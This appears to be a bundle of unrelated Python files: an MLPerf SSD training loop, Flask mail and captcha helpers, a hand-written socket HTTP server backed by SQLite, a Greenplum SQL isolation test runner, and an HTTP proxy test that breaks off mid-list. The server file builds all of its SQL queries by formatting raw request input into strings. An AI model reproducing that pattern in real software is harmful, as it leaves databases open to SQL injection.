for p in processes:
p.start()
def log_eval_results_fn():
"""Print out MLPerf log."""
result = q_out.get()
success = False
while result[0] != _STOP:
if not success:
steps_per_epoch = (
FLAGS.num_examples_per_epoch // FLAGS.train_batch_size)
epoch = (result[0] + FLAGS.iterations_per_loop) // steps_per_epoch
mlp_log.mlperf_print(
'eval_accuracy',
result[1]['COCO/AP'],
metadata={'epoch_num': epoch})
mlp_log.mlperf_print('eval_stop', None, metadata={'epoch_num': epoch})
if result[1]['COCO/AP'] > ssd_constants.EVAL_TARGET:
success = True
mlp_log.mlperf_print(
'run_stop', None, metadata={'status': 'success'})
result = q_out.get()
if not success:
mlp_log.mlperf_print('run_stop', None, metadata={'status': 'abort'})
log_eval_result_thread = threading.Thread(target=log_eval_results_fn)
log_eval_result_thread.start()
def eval_init_fn(cur_step):
"""Executed before every eval."""
steps_per_epoch = FLAGS.num_examples_per_epoch // FLAGS.train_batch_size
epoch = cur_step // steps_per_epoch
mlp_log.mlperf_print(
'block_start',
None,
metadata={
'first_epoch_num': epoch,
'epoch_count': FLAGS.iterations_per_loop // steps_per_epoch
})
mlp_log.mlperf_print(
'eval_start',
None,
metadata={
'epoch_num': epoch + FLAGS.iterations_per_loop // steps_per_epoch
})
def eval_finish_fn(cur_step, eval_output, _):
steps_per_epoch = FLAGS.num_examples_per_epoch // FLAGS.train_batch_size
epoch = cur_step // steps_per_epoch
mlp_log.mlperf_print(
'block_stop',
None,
metadata={
'first_epoch_num': epoch,
'epoch_count': FLAGS.iterations_per_loop // steps_per_epoch
})
if FLAGS.run_cocoeval:
q_in.put((cur_step, eval_output['detections']))
runner.train_and_eval(eval_init_fn, eval_finish_fn)
if FLAGS.run_cocoeval:
for _ in processes:
q_in.put((_STOP, None))
for p in processes:
try:
p.join(timeout=10)
except Exception: # pylint: disable=broad-except
pass
q_out.put((_STOP, None))
log_eval_result_thread.join()
# Clear out all the queues to avoid deadlock.
while not q_out.empty():
q_out.get()
while not q_in.empty():
q_in.get()
if __name__ == '__main__':
# copybara:strip_begin
user_data = (multiprocessing.Queue(maxsize=ssd_constants.QUEUE_SIZE),
multiprocessing.Queue(maxsize=ssd_constants.QUEUE_SIZE))
in_compile_test = False
for arg in sys.argv:
if arg == '--xla_jf_exit_process_on_compilation_success=true':
in_compile_test = True
break
if in_compile_test:
# Exiting from XLA's C extension skips REDACTEDprocess's multiprocessing clean
# up. Don't use REDACTED process when xla is in compilation only mode.
tf.logging.set_verbosity(tf.logging.INFO)
app.run(main)
else:
with REDACTEDprocess.main_handler(user_data=user_data):
tf.logging.set_verbosity(tf.logging.INFO)
app.run(main)
# copybara:strip_end
# copybara:insert tf.logging.set_verbosity(tf.logging.INFO)
# copybara:insert app.run(main)
|
utils.py
|
# coding=utf-8
import json
import random
from bson import ObjectId
from flask_mail import Message
from . import extensions, models
from threading import Thread
from flask import current_app, session, request
class JSONEncoder(json.JSONEncoder):
def default(self, o):
if isinstance(o, ObjectId):
return str(o)
return json.JSONEncoder.default(self, o)
def verify_num(code):
from .code_msg import VERIFY_CODE_ERROR
if code != session['ver_code']:
raise models.GlobalApiException(VERIFY_CODE_ERROR)
# return result
def gen_verify_num():
a = random.randint(-20, 20)
b = random.randint(0, 50)
data = {'question': str(a) + ' + ' + str(b) + " = ?", 'answer': str(a + b)}
session['ver_code'] = data['answer']
return data
def gen_cache_key():
return 'view//' + request.full_path
def send_mail_async(app, msg):
with app.app_context():
extensions.mail.send(msg)
def send_email(to, subject, body, is_txt=True):
app = current_app._get_current_object()
msg = Message(subject=app.config.get('MAIL_SUBJECT_PREFIX') + subject, sender=app.config.get('MAIL_USERNAME'), recipients=[to])
if is_txt:
msg.body = body
else:
msg.html = body
thr = Thread(target=send_mail_async, args=[app, msg])
thr.start()
return thr
|
run.py
|
import json
import logging
import os
import socket
import sqlite3
import threading
logger = logging.getLogger("WebServer")
logger.setLevel(logging.INFO)
console_handler = logging.StreamHandler()
console_handler.setLevel(logging.INFO)
logger.addHandler(console_handler)
logging.root = logger
def _connect_to_db(db_path):
logging.info("Connecting to: {}".format(db_path))
con = sqlite3.connect(db_path)
return con
def get_function(parameters):
global db_path
_DB_CON_ = _connect_to_db(db_path)
logging.info("Calling get function with parameters: {}".format(parameters))
item = parameters[0]
items = item.split(" ")
if len(items) == 2:
return construct_response(400, "Bad Request")
else:
item = items[1].strip("/")
if len(item) == 0:
st = _DB_CON_.execute("SELECT * from exploits").fetchall()
tt = {"status_code": 1, "result": st}
return append_dict(construct_response(200, "OK"), tt)
if len(item) != 32:
tt = {"status_code": -1, "result": "Invalid md5"}
return append_dict(construct_response(400, "Bad Request"), tt)
st = _DB_CON_.execute("SELECT * from exploits where md5='{}'".format(item)).fetchall()
if len(st) == 0:
tt = {"status_code": 0}
else:
tt = {"status_code": 1, "result": [{"md5": st[0][0], "description": st[0][1]}]}
return append_dict(construct_response(200, "OK"), tt)
def put_function(parameters):
logging.info("Calling put function with parameters: {}".format(parameters))
md5 = ''
description = ''
for item in parameters:
if "md5" in item:
md5 = item.split("\"md5\":")[1].split('"')[1].split('"')[0]
description = item.split("\"details\":")[1].split('"')[1].split('"')[0]
if md5 == '' or description == '':
tt = {"md5":md5, "description": description}
return append_dict(construct_response(400, "Bad Request"), tt)
items = parameters[0].split(" ")
item = items[1].strip("/")
_DB_CON_ = _connect_to_db(db_path)
if len(item) == 0:
_DB_CON_.execute("INSERT into exploits values('{}', '{}')".format(md5, description))
st = _DB_CON_.execute("SELECT * from exploits where md5='{}'".format(md5)).fetchall()
_DB_CON_.commit()
if len(st) != 0:
tt = {"status_code": 1, "result": json.dumps(st)}
return append_dict(construct_response(200, "OK"), tt)
else:
tt = {"status_code": 0, "result": "Something went wrong"}
return append_dict(construct_response(200, "OK"), tt)
elif len(item) == 32:
st = _DB_CON_.execute("SELECT * from exploits where md5='{}'".format(md5)).fetchall()
_DB_CON_.commit()
if len(st) != 0:
st = _DB_CON_.execute("UPDATE exploits set details = '{}' where md5='{}'".format(description, md5))
st = _DB_CON_.execute("SELECT * from exploits where md5='{}'".format(item)).fetchall()
_DB_CON_.commit()
tt = {"status_code": 1, "result": json.dumps(st)}
return append_dict(construct_response(200, "OK"), tt)
else:
tt = {"status_code": 0, "result": "Something went wrong"}
return append_dict(construct_response(200, "OK"), tt)
else:
tt = {"status_code": -1, "result": "Invalid md5"}
return append_dict(construct_response(400, "Bad Request"), tt)
def post_function(parameters):
logging.info("Calling post function with parameters: {}".format(parameters))
_DB_CON_ = _connect_to_db(db_path)
_DB_CON_.execute("DELETE from exploits")
new_result = []
for item in parameters:
if "md5" in item:
results = item.split(",")
counter = 0
rez = {"md5":None, "details":None}
for tt in results:
if "md5" in tt:
md5 = tt.split("\"md5\":")[1].split('"')[1].split('"')[0]
rez = {"md5": md5, "details":None}
if "details" in tt:
description = tt.split("\"details\":")[1].split('"')[1].split('"')[0]
rez["details"] = description
new_result.append(rez.copy())
for item in new_result:
_DB_CON_.execute("INSERT into exploits values('{}','{}')".format(item["md5"], item["details"]))
_DB_CON_.commit()
return construct_response(202, "Accepted")
def delete_function(parameters):
logging.info("Calling update function with parameters: {}".format(parameters))
global db_path
_DB_CON_ = _connect_to_db(db_path)
logging.info("Calling get function with parameters: {}".format(parameters))
item = parameters[0]
items = item.split(" ")
if len(items) == 2:
return construct_response(400, "Bad Request")
else:
item = items[1].strip("/")
if len(item) == 0:
st = _DB_CON_.execute("DELETE from exploits")
tt = {"status_code": 1, "result": "all datas have been deleted"}
st = _DB_CON_.execute("SELECT * from exploits").fetchall()
_DB_CON_.commit()
if len(st) == 0:
tt = {"status_code": 1, "result": "ALL DATA HAS BEEN DELETED"}
return append_dict(construct_response(200, "OK"), tt)
else:
tt = {"status_code": 0, "result": "Something went wrong"}
return append_dict(construct_response(200, "OK"), tt)
if len(item) != 32:
tt = {"status_code": -1, "result": "Invalid md5"}
return append_dict(construct_response(400, "Bad Request"), tt)
st = _DB_CON_.execute("DELETE from exploits where md5='{}'".format(item))
st = _DB_CON_.execute("SELECT * from exploits where md5='{}'".format(item)).fetchall()
_DB_CON_.commit()
if len(st) == 0:
tt = {"status_code": 1, "result": "DATA HAS BEEN DELETED"}
return append_dict(construct_response(200, "OK"), tt)
else:
tt = {"status_code": 0, "result": "Something went wrong"}
return append_dict(construct_response(200, "OK"), tt)
possible_requests = {
"get": get_function,
"put": put_function,
"post": post_function,
"delete": delete_function,
}
def construct_response(code, text):
response = ''
response += 'HTTP/1.1 {} {}\r\n'.format(code, text)
response += 'Connection: close\r\n\r\n'
return response.encode()
def append_dict(response, dict):
response = response.decode()
response += json.dumps(dict)
response = response.encode()
return response
def server_function(client, address):
logging.info("[server function][connection] client: {} | address: {}".format(client, address))
while True:
packet = client.recv(4096).decode()
packet = packet.split("\r\n")
logging.info("packet:\n{}".format(packet))
method = packet[0].split(" ")[0].lower()
if method not in possible_requests:
response = construct_response(400, "Bad Request")
else:
response = possible_requests[method](packet)
logger.info(packet)
logging.info("sending response: {}".format(response))
client.send(response)
client.close()
break
host = socket.gethostname()
port = int(input("Please insert the server port: "))
html_docs = str(input("Please insert the directory path for your resources: "))
logging.info("Preparing to start the server {}:{} | Resource location: {}".format(host, port, html_docs))
logging.info("Creating the server...")
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serversocket.bind((host, port))
serversocket.listen(5)
logger.info("Server has started...")
db_path = os.path.join(html_docs, "data")
while True:
(client, address) = serversocket.accept()
logging.info("[new connection] client: {} | address: {}".format(client, address))
threadObj = threading.Thread(target=server_function, args=(client, address))
threadObj.start()
|
sql_isolation_testcase.py
|
"""
Copyright (c) 2004-Present Pivotal Software, Inc.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pygresql.pg
import os
import subprocess
import re
import multiprocessing
import time
import sys
import socket
from optparse import OptionParser
import traceback
class SQLIsolationExecutor(object):
def __init__(self, dbname=''):
self.processes = {}
# The re.S flag makes the "." in the regex match newlines.
# When matched against a command in process_command(), all
# lines in the command are matched and sent as SQL query.
self.command_pattern = re.compile(r"^(\d+|[*])([&\\<\\>Uq]*?)\:(.*)", re.S)
if dbname:
self.dbname = dbname
else:
self.dbname = os.environ.get('PGDATABASE')
class SQLConnection(object):
def __init__(self, out_file, name, utility_mode, dbname):
self.name = name
self.utility_mode = utility_mode
self.out_file = out_file
self.dbname = dbname
parent_conn, child_conn = multiprocessing.Pipe(True)
self.p = multiprocessing.Process(target=self.session_process, args=(child_conn,))
self.pipe = parent_conn
self.has_open = False
self.p.start()
# Close "our" copy of the child's handle, so that if the child dies,
# recv() on the pipe will fail.
child_conn.close();
self.out_file = out_file
def session_process(self, pipe):
sp = SQLIsolationExecutor.SQLSessionProcess(self.name,
self.utility_mode, self.out_file.name, pipe, self.dbname)
sp.do()
def query(self, command):
print >>self.out_file
self.out_file.flush()
if len(command.strip()) == 0:
return
if self.has_open:
raise Exception("Cannot query command while waiting for results")
self.pipe.send((command, False))
r = self.pipe.recv()
if r is None:
raise Exception("Execution failed")
print >>self.out_file, r.strip()
def fork(self, command, blocking):
print >>self.out_file, " <waiting ...>"
self.pipe.send((command, True))
if blocking:
time.sleep(0.5)
if self.pipe.poll(0):
raise Exception("Forked command is not blocking")
self.has_open = True
def join(self):
print >>self.out_file, " <... completed>"
r = self.pipe.recv()
if r is None:
raise Exception("Execution failed")
print >>self.out_file, r.strip()
self.has_open = False
def stop(self):
self.pipe.send(("", False))
self.p.join()
if self.has_open:
raise Exception("Should not finish test case while waiting for results")
def quit(self):
print >>self.out_file, "... <quitting>"
self.stop()
def terminate(self):
self.pipe.close()
self.p.terminate()
class SQLSessionProcess(object):
def __init__(self, name, utility_mode, output_file, pipe, dbname):
"""
Constructor
"""
self.name = name
self.utility_mode = utility_mode
self.pipe = pipe
self.dbname = dbname
if self.utility_mode:
(hostname, port) = self.get_utility_mode_port(name)
self.con = pygresql.pg.connect(host=hostname,
port=port,
opt="-c gp_session_role=utility",
dbname=self.dbname)
else:
self.con = pygresql.pg.connect(dbname=self.dbname)
self.filename = "%s.%s" % (output_file, os.getpid())
def get_utility_mode_port(self, name):
"""
Gets the port number/hostname combination of the
dbid with the id = name
"""
con = pygresql.pg.connect(dbname=self.dbname)
r = con.query("SELECT hostname, port FROM gp_segment_configuration WHERE dbid = %s" % name).getresult()
if len(r) == 0:
raise Exception("Invalid dbid %s" % name)
if r[0][0] == socket.gethostname():
return (None, int(r[0][1]))
return (r[0][0], int(r[0][1]))
def printout_result(self, r):
"""
This is a pretty dirty, but apprently the only way
to get the pretty output of the query result.
The reason is that for some python internal reason
print(r) calls the correct function while neighter str(r)
nor repr(r) output something useful.
"""
with open(self.filename, "w") as f:
print >>f, r,
f.flush()
with open(self.filename, "r") as f:
ppr = f.read()
return ppr.strip() + "\n"
def execute_command(self, command):
"""
Executes a given command
"""
try:
r = self.con.query(command)
if r and type(r) == str:
echo_content = command[:-1].partition(" ")[0].upper()
return "%s %s" % (echo_content, self.printout_result(r))
elif r:
return self.printout_result(r)
else:
echo_content = command[:-1].partition(" ")[0].upper()
return echo_content
except Exception as e:
return str(e)
def do(self):
"""
Process loop.
Ends when the command None is received
"""
(c, wait) = self.pipe.recv()
while c:
if wait:
time.sleep(0.1)
r = self.execute_command(c)
self.pipe.send(r)
r = None
(c, wait) = self.pipe.recv()
if os.path.exists(self.filename):
os.unlink(self.filename)
def get_process(self, out_file, name, utility_mode=False, dbname=""):
"""
Gets or creates the process by the given name
"""
if len(name) > 0 and not name.isdigit():
raise Exception("Name should be a number")
if len(name) > 0 and not utility_mode and int(name) >= 1024:
raise Exception("Session name should be smaller than 1024 unless it is utility mode number")
if not (name, utility_mode) in self.processes:
if not dbname:
dbname = self.dbname
self.processes[(name, utility_mode)] = SQLIsolationExecutor.SQLConnection(out_file, name, utility_mode, dbname)
return self.processes[(name, utility_mode)]
def quit_process(self, out_file, name, utility_mode=False, dbname=""):
"""
Quits a process with the given name
"""
if len(name) > 0 and not name.isdigit():
raise Exception("Name should be a number")
if len(name) > 0 and not utility_mode and int(name) >= 1024:
raise Exception("Session name should be smaller than 1024 unless it is utility mode number")
if not (name, utility_mode) in self.processes:
raise Exception("Sessions not started cannot be quit")
self.processes[(name, utility_mode)].quit()
del self.processes[(name, False)]
def get_all_primary_dbids(self, dbname):
"""
Retrieves all primary DBIDs (including the master). Intended for use by
*U queries.
"""
if not dbname:
dbname = self.dbname
con = pygresql.pg.connect(dbname=dbname)
result = con.query("SELECT dbid FROM gp_segment_configuration WHERE role = 'p'").getresult()
if len(result) == 0:
raise Exception("Invalid gp_segment_configuration contents")
return [int(dbid[0]) for dbid in result]
def process_command(self, command, output_file):
"""
Processes the given command.
The command at this point still includes the isolation behavior
flags, e.g. which session to use.
"""
process_name = ""
sql = command
flag = ""
dbname = ""
m = self.command_pattern.match(command)
if m:
process_name = m.groups()[0]
flag = m.groups()[1]
sql = m.groups()[2]
sql = sql.lstrip()
# If db_name is specifed , it should be of the following syntax:
# 1:@db_name <db_name>: <sql>
if sql.startswith('@db_name'):
sql_parts = sql.split(':', 2)
if not len(sql_parts) == 2:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
if not sql_parts[0].startswith('@db_name'):
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
if not len(sql_parts[0].split()) == 2:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
dbname = sql_parts[0].split()[1].strip()
if not dbname:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
sql = sql_parts[1]
if not flag:
if sql.startswith('!'):
cmd_output = subprocess.Popen(sql[1:].strip(), stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
print >> output_file
print >> output_file, cmd_output.stdout.read()
else:
self.get_process(output_file, process_name, dbname=dbname).query(sql.strip())
elif flag == "&":
self.get_process(output_file, process_name, dbname=dbname).fork(sql.strip(), True)
elif flag == ">":
self.get_process(output_file, process_name, dbname=dbname).fork(sql.strip(), False)
elif flag == "<":
if len(sql) > 0:
raise Exception("No query should be given on join")
self.get_process(output_file, process_name, dbname=dbname).join()
elif flag == "U":
if process_name == '*':
process_names = [str(dbid) for dbid in self.get_all_primary_dbids(dbname)]
else:
process_names = [process_name]
for name in process_names:
self.get_process(output_file, name, utility_mode=True, dbname=dbname).query(sql.strip())
elif flag == "U&":
self.get_process(output_file, process_name, utility_mode=True, dbname=dbname).fork(sql.strip(), True)
elif flag == "U<":
if len(sql) > 0:
raise Exception("No query should be given on join")
self.get_process(output_file, process_name, utility_mode=True, dbname=dbname).join()
elif flag == "q":
if len(sql) > 0:
raise Exception("No query should be given on quit")
self.quit_process(output_file, process_name, dbname=dbname)
else:
raise Exception("Invalid isolation flag")
def process_isolation_file(self, sql_file, output_file):
"""
Processes the given sql file and writes the output
to output file
"""
try:
command = ""
for line in sql_file:
#tinctest.logger.info("re.match: %s" %re.match(r"^\d+[q\\<]:$", line))
print >>output_file, line.strip(),
(command_part, dummy, comment) = line.partition("--")
if command_part == "" or command_part == "\n":
print >>output_file
elif command_part.endswith(";\n") or re.match(r"^\d+[q\\<]:$", line) or re.match(r"^\d+U[\\<]:$", line):
command += command_part
try:
self.process_command(command, output_file)
except Exception as e:
print >>output_file, "FAILED: ", e
command = ""
else:
command += command_part
for process in self.processes.values():
process.stop()
except:
for process in self.processes.values():
process.terminate()
raise
finally:
for process in self.processes.values():
process.terminate()
class SQLIsolationTestCase:
"""
The isolation test case allows a fine grained control of interleaved
executing transactions. This is mainly used to test isolation behavior.
[<#>[flag]:] <sql> | ! <shell scripts or command>
#: either an integer indicating an unique session, or a dbid if followed
by U (for utility-mode connections). In 'U' mode, the dbid can
alternatively be an asterisk '*' to perform a utility-mode query on
the master and all primaries.
flag:
&: expect blocking behavior
>: running in background without blocking
<: join an existing session
q: quit the given session
U: connect in utility mode to dbid from gp_segment_configuration
U&: expect blocking behavior in utility mode (does not currently support an asterisk target)
U<: join an existing utility mode session (does not currently support an asterisk target)
An example is:
Execute BEGIN in transaction 1
Execute BEGIN in transaction 2
Execute INSERT in transaction 2
Execute SELECT in transaction 1
Execute COMMIT in transaction 2
Execute SELECT in transaction 1
The isolation tests are specified identical to sql-scripts in normal
SQLTestCases. However, it is possible to prefix a SQL line with
an tranaction identifier followed by a colon (":").
The above example would be defined by
1: BEGIN;
2: BEGIN;
2: INSERT INTO a VALUES (1);
1: SELECT * FROM a;
2: COMMIT;
1: SELECT * FROM a;
Blocking behavior can be tested by forking and joining.
1: BEGIN;
2: BEGIN;
1: DELETE FROM foo WHERE a = 4;
2&: DELETE FROM foo WHERE a = 4;
1: COMMIT;
2<:
2: COMMIT;
2& forks the command. It is executed in the background. If the
command is NOT blocking at this point, it is considered an error.
2< joins the background command and outputs the result of the
command execution.
Session ids should be smaller than 1024.
2U: Executes a utility command connected to port 40000.
One difference to SQLTestCase is the output of INSERT.
SQLTestCase would output "INSERT 0 1" if one tuple is inserted.
SQLIsolationTestCase would output "INSERT 1". As the
SQLIsolationTestCase needs to have a more fine-grained control
over the execution order than possible with PSQL, it uses
the pygresql python library instead.
Connecting to a specific database:
1. If you specify a db_name metadata in the sql file, connect to that database in all open sessions.
2. If you want a specific session to be connected to a specific database , specify the sql as follows:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: <sql>
2: <sql>
etc
Here session 1 will be connected to testdb and session 2 will be connected to test2db. You can specify @db_name only at the beginning of the session. For eg:, following would error out:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: @db_name testdb: <sql>
2: <sql>
etc
Quitting sessions:
By default, all opened sessions will be stopped only at the end of the sql file execution. If you want to explicitly quit a session
in the middle of the test execution, you can specify a flag 'q' with the session identifier. For eg:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: <sql>
2: <sql>
1q:
2: <sql>
3: <sql>
2q:
3: <sql>
2: @db_name test: <sql>
1q: ---> Will quit the session established with testdb.
2q: ---> Will quit the session established with test2db.
The subsequent 2: @db_name test: <sql> will open a new session with the database test and execute the sql against that session.
Catalog Modification:
Some tests are easier to write if it's possible to modify a system
catalog across the *entire* cluster. To perform a utility-mode query on
all segments and the master, you can use *U commands:
*U: SET allow_system_table_mods = 'DML';
*U: UPDATE pg_catalog.<table> SET <column> = <value> WHERE <cond>;
Since the number of query results returned by a *U command depends on
the developer's cluster configuration, it can be useful to wrap them in
a start_/end_ignore block. (Unfortunately, this also hides legitimate
failures; a better long-term solution is needed.)
Block/join flags are not currently supported with *U.
"""
def run_sql_file(self, sql_file, out_file = None, out_dir = None, optimizer = None):
"""
Given a sql file and an ans file, this adds the specified gucs (self.gucs) to the sql file , runs the sql
against the test case databse (self.db_name) and verifies the output with the ans file.
If an 'init_file' exists in the same location as the sql_file, this will be used
while doing gpdiff.
"""
# Add gucs to the test sql and form the actual sql file to be run
if not out_dir:
out_dir = self.get_out_dir()
if not os.path.exists(out_dir):
TINCSystem.make_dirs(out_dir, ignore_exists_error = True)
if optimizer is None:
gucs_sql_file = os.path.join(out_dir, os.path.basename(sql_file))
else:
# sql file will be <basename>_opt.sql or <basename>_planner.sql based on optimizer
gucs_sql_file = os.path.join(out_dir, os.path.basename(sql_file).replace('.sql', '_%s.sql' %self._optimizer_suffix(optimizer)))
self._add_gucs_to_sql_file(sql_file, gucs_sql_file, optimizer)
self.test_artifacts.append(gucs_sql_file)
if not out_file:
if optimizer is None:
out_file = os.path.join(self.get_out_dir(), os.path.basename(sql_file).replace('.sql', '.out'))
else:
# out file will be *_opt.out or *_planner.out based on optimizer
out_file = os.path.join(self.get_out_dir(), os.path.basename(sql_file).replace('.sql', '_%s.out' %self._optimizer_suffix(optimizer)))
self.test_artifacts.append(out_file)
executor = SQLIsolationExecutor(dbname=self.db_name)
with open(out_file, "w") as f:
executor.process_isolation_file(open(sql_file), f)
f.flush()
if out_file[-2:] == '.t':
out_file = out_file[:-2]
return out_file
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("--dbname", dest="dbname",
help="connect to database DBNAME", metavar="DBNAME")
(options, args) = parser.parse_args()
executor = SQLIsolationExecutor(dbname=options.dbname)
executor.process_isolation_file(sys.stdin, sys.stdout)
|
http_1_0_server_http_client_behaviors_test.py
|
import test_util.proxy
import test_util.runner
import http.client
import http.server
import threading
import test_util.thread_safe_counter
import random
import time
if __name__ == "__main__":
request_counter = test_util.thread_safe_counter.Counter()
# This is HTTP 1.0 server that doesn't support persisent connections
class Server(http.server.BaseHTTPRequestHandler):
disable_nagle_algorithm = True
def do_HEAD(self):
request_counter.increment()
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Content-Length", 5)
self.end_headers()
def write_chunked(self, what, padded):
remaining = what
while len(remaining) > 0:
chunk_length = random.randint(1, len(remaining))
self.write_chunk(remaining[:chunk_length], padded)
remaining = remaining[chunk_length:]
self.write_chunk(remaining, padded)
def write_chunk(self, chunk, padded):
if padded and random.randint(0, 1) == 0:
self.wfile.write(b"0")
self.wfile.flush()
time.sleep(0.001)
padding = random.randint(0, 5) if padded else 0
self.wfile.write(((b"%%0%dx\r\n") % padding) % len(chunk) + chunk + b"\r\n")
self.wfile.flush()
if random.randint(0, 1) == 0:
time.sleep(0.001)
def do_POST(self):
request_counter.increment()
content_length = int(self.headers["Content-Length"])
body = self.rfile.read(content_length) if content_length > 0 else ""
body_length = len(body)
if self.path == "/body_200_no_length/":
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(b"<h1>body_200 %d</h1>" % body_length)
elif self.path == "/body_200_length/":
self.send_response(200)
response = b"<h1>body_200 %d</h1>" % body_length
self.send_header("Content-type", "text/html")
self.send_header("Content-Length", str(len(response)))
self.end_headers()
self.wfile.write(response)
elif self.path == "/body_200_chunked/":
self.send_response(200)
response = b"<h1>body_200 %d</h1>" % body_length
self.send_header("Content-type", "text/html")
self.send_header("Transfer-Encoding", "chunked")
self.end_headers()
self.write_chunked(response, padded=False)
elif self.path == "/body_200_chunked_padded_length/":
self.send_response(200)
response = b"<h1>body_200 %d</h1>" % body_length
self.send_header("Content-type", "text/html")
self.send_header("Transfer-Encoding", "chunked")
self.end_headers()
self.write_chunked(response, padded=True)
elif self.path == "/no_body_200_no_length/":
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
elif self.path == "/no_body_200_length/":
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Content-Length", "0")
self.end_headers()
def do_GET(self):
request_counter.increment()
if self.path == "/body_200_no_length/":
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(b"<h1>body_200</h1>")
elif self.path == "/body_200_length/":
self.send_response(200)
response = b"<h1>body_200</h1>"
self.send_header("Content-type", "text/html")
self.send_header("Content-Length", str(len(response)))
self.end_headers()
self.wfile.write(response)
elif self.path == "/body_200_chunked/":
self.send_response(200)
response = b"<h1>body_200</h1>"
self.send_header("Content-type", "text/html")
self.send_header("Transfer-Encoding", "chunked")
self.end_headers()
self.write_chunked(response, padded=False)
elif self.path == "/body_200_chunked_padded_length/":
self.send_response(200)
response = b"<h1>body_200</h1>"
self.send_header("Content-type", "text/html")
self.send_header("Transfer-Encoding", "chunked")
self.end_headers()
self.write_chunked(response, padded=True)
elif self.path == "/no_body_200_no_length/":
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
elif self.path == "/no_body_200_length/":
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Content-Length", "0")
self.end_headers()
server = http.server.HTTPServer(("localhost", 0), Server)
server_port = server.server_address[1]
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True # thread dies with the program
thread.start()
expected_request_counter = 0
def test_requests(proxy_port, behavior, send_immediately, method, suffix):
global expected_request_counter
http_connection = http.client.HTTPConnection("127.0.0.1", proxy_port)
http_connection.connect()
test_util.runner.get_line_from_queue_and_assert(queue, "connection\n")
url = "http://localhost:%d/%s/" % (server_port, suffix)
if method == "POST":
# We want to often test short payloads that will fit in the same
# packet with the pre body.
body_length = random.choice(
[random.randint(0, 1), random.randint(2, 100000)]
)
body = "a" * body_length
else:
body_length = None
body = None
http_connection.request(method, url, body)
stream = (
"none"
if behavior.startswith("buffer_request_")
or behavior
in {
"request_body_last_generates_response_with_body",
"request_body_last_generates_response_without_body",
}
else (
"downstream"
if behavior
in {
"request_pre_body_generates_response_with_body",
"request_pre_body_generates_response_without_body",
}
else "upstream"
)
)
if (
behavior.endswith("default")
or behavior.endswith("response_pre_body_generates_response_with_body")
or behavior.endswith("response_pre_body_generates_response_without_body")
or behavior.endswith("response_pre_body_prepend")
or behavior.endswith("response_body_prepend")
or behavior.endswith("response_body_append")
):
expected_request_counter += 1
test_util.runner.get_line_from_queue_and_assert(
queue, "request_pre_body /%s/ %s\n" % (suffix, stream)
)
test_util.runner.get_line_from_queue_and_assert(
queue, "request_body_some_last /%s/\n" % suffix
)
if (
behavior.endswith("default")
or behavior.endswith("response_pre_body_generates_response_with_body")
or behavior.endswith("response_pre_body_generates_response_without_body")
or behavior.endswith("response_pre_body_prepend")
or behavior.endswith("response_body_prepend")
or behavior.endswith("response_body_append")
):
stream = "none" if False else "downstream"
test_util.runner.get_line_from_queue_and_assert(
queue, "response_pre_body /%s/ 200 %s\n" % (suffix, stream)
)
test_util.runner.get_line_from_queue_and_assert(
queue, "response_body_some_last /%s/\n" % suffix
)
test_util.runner.get_line_from_queue_and_assert(queue, "response_finished\n")
response = http_connection.getresponse()
if method == "HEAD":
expected_body = b""
elif (
behavior
in {
"request_pre_body_generates_response_with_body",
"request_body_last_generates_response_with_body",
}
or behavior.endswith("response_pre_body_generates_response_with_body")
):
expected_body = b"<h1>%s</h1>" % str.encode(behavior)
else:
if (
suffix
in {
"no_body_200_no_length",
"no_body_200_length",
}
or behavior
in {
"request_pre_body_generates_response_without_body",
"request_body_last_generates_response_without_body",
}
or behavior.endswith(
"response_pre_body_generates_response_without_body"
)
):
expected_body = b""
else:
expected_body = (
b"<h1>body_200</h1>"
if body_length is None
else (b"<h1>body_200 %d</h1>" % body_length)
)
if behavior.endswith("response_pre_body_prepend") or behavior.endswith(
"response_body_prepend"
):
expected_body = b"<h1>Pre body</h1>" + expected_body
elif behavior.endswith("response_body_append"):
expected_body += b"<h1>Post body</h1>"
read_body = response.read()
if behavior in {"body_200_chunked", "body_200_chunked_padded_length"}:
remaining_body = read_body
read_body = ""
while True:
carriage_return_index = remaining_body.index("\r")
chunk_length = int(remaining_body[:carriage_return_index], 16)
if chunk_length == 0:
break
read_body += remaining_body[
carriage_return_index + 2 : carriage_return_index + 2 + chunk_length
]
remaining_body = remaining_body[
carriage_return_index + 2 + chunk_length + 2
]
assert read_body == expected_body, "%s body %s doesn't match %s!" % (
url,
read_body,
expected_body,
)
http_connection.close()
assert expected_request_counter == request_counter.value(), (
"Unexpected request_count - expected %d was %d",
expected_request_counter,
request_counter.value(),
)
test_util.runner.get_line_from_queue_and_assert(queue, "connection_finished\n")
for behavior in [
"default",
"buffer_request_default",
"request_pre_body_generates_response_with_body",
"request_pre_body_generates_response_without_body",
"request_body_last_generates_response_with_body",
"request_body_last_generates_response_without_body",
"response_pre_body_generates_response_with_body",
"response_pre_body_generates_response_without_body",
"buffer_request_response_pre_body_generates_response_with_body",
